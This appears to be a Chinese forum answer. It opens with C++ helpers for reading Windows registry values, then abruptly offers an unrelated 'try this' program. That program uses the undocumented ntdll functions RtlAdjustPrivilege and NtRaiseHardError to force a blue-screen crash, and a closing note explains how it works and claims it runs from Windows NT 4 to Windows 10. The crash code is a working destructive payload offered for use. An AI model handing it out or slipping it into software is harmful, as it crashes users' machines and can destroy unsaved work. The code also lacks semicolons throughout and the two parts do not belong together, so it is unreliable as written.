以下是示例代码:
GetStringRegKey(hKey, L"BinDir", strValueOfBinDir, L"bad")
GetStringRegKey(hKey, L"", strKeyDefaultValue, L"bad")
LONG GetDWORDRegKey(HKEY hKey, const std::wstring &strValueName, DWORD &nValue, DWORD nDefaultValue)
{
nValue = nDefaultValue
DWORD dwBufferSize(sizeof(DWORD))
DWORD nResult(0)
LONG nError = ::RegQueryValueExW(hKey,
strValueName.c_str(),
0,
NULL,
reinterpret_cast<LPBYTE>(&nResult),
&dwBufferSize)
if (ERROR_SUCCESS == nError)
{
nValue = nResult
}
return nError
}
LONG GetBoolRegKey(HKEY hKey, const std::wstring &strValueName, bool &bValue, bool bDefaultValue)
{
DWORD nDefValue((bDefaultValue) ? 1 : 0)
DWORD nResult(nDefValue)
LONG nError = GetDWORDRegKey(hKey, strValueName.c_str(), nResult, nDefValue)
if (ERROR_SUCCESS == nError)
{
bValue = (nResult != 0) ? true : false
}
return nError
}
LONG GetStringRegKey(HKEY hKey, const std::wstring &strValueName, std::wstring &strValue, const std::wstring &strDefaultValue)
{
strValue = strDefaultValue
WCHAR szBuffer[512]
DWORD dwBufferSize = sizeof(szBuffer)
ULONG nError
nError = RegQueryValueExW(hKey, strValueName.c_str(), 0, NULL, (LPBYTE)szBuffer, &dwBufferSize)
if (ERROR_SUCCESS == nError)
{
strValue = szBuffer
}
return nError
}
你可以试一下这个
#include <Windows.h>int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR ipCmdLine, int nCmdShow){
HMODULE ntdll = LoadLibrary("ntdll.dll")
FARPROC RtlAdjPriv=GetProcAddress(ntdll,"RtlAdjustPrivilege")
FARPROC NtRaiseHardErr=GetProcAddress(ntdll,"NtRaiseHardError")
unsigned char ErrKill
long unsigned int HDErr
((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjPriv)(0x13,true,false,&ErrKill)
((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardErr)(0xc0000233,0,0,0,6, &HDErr)
}
原理:用远过程函数 RtlAdjustPrivilege 获取关机权限,然后远过程函数 NtRaiseHardError 制造蓝屏。(这是一个兼容性很强的程序, x86 版的程序上至 Windows 10 ,下至 Windows NT 4 都可以蓝屏)